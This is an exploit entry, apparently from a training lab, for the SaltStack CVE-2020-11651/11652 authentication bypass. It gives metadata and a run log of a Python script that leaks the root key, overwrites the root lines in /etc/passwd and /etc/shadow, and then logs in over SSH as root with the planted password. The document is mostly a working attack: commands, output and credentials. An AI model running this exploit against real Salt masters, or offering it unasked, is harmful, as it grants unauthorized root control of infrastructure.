一个利用 SaltStack CVE-2020-11651 和 CVE-2020-11652 漏洞的脚本,通过向 /etc/passwd 和 /etc/shadow 注入记录,将新用户添加到易受攻击的 Salt 主节点。
# Exploit Title: Saltstack 3000.1 - Remote Code Execution
# 日期: 2020-05-04
# 原始漏洞作者: Jasper Lievisse Adriaanse
# 修改作者: Drew Alleman
# 厂商主页: https://www.saltstack.com/
# 版本: < 3000.2, < 2019.2.4, 2017.*, 2018.*
# 测试环境: Debian 10,Salt 2019.2.0
# CVE : CVE-2020-11651 和 CVE-2020-11652
# 描述: Saltstack 认证绕过/远程代码执行
#
# 原始来源: https://github.com/jasperla/CVE-2020-11651-poc
# 修改来源: https://github.com/Drew-Alleman/CVE-2020-11651
# 此漏洞利用基于以下检查脚本:
# https://github.com/rossengeorgiev/salt-security-backports
$ python3 CVE-2020-11651-11652-add_user.py -m 192.168.158.62 --replace-root -d
[DEBUG] 认证信息响应: ['user', 'UserAuthenticationError', {'root': 'MpZiP+J3yTzjOQ+ILgZ7KN+os/Jadne3sLha7b7kNz2jLBxBC9hDlajSCObG/ZASPF1RfAr9Lrs='}, []]
[DEBUG] 已连接到 192.168.158.62:4506
[DEBUG] 正在从 /etc/passwd 移除现有的 root 行
[DEBUG] 正在从 /etc/shadow 移除现有的 root 行
[DEBUG] 已写入 /etc/passwd
[DEBUG] 已写入 /etc/shadow
[INFO] 用户 root:cvQ0OQaXOf8aYi0Ox*eKGPAQ 创建成功。
┌──(.venv)─(drew㉿whitehat)-[~/OSCP_LIKE/Linux/Twiggy/exploits]
└─$ sshpass -p 'cvQ0OQaXOf8aYi0Ox*eKGPAQ' ssh [email protected]
Last login: Sun Mar 30 02:23:06 2025 from 192.168.45.180
[root@twiggy ~]# id
uid=0(root) gid=0(root) groups=0(root)
[root@twiggy ~]#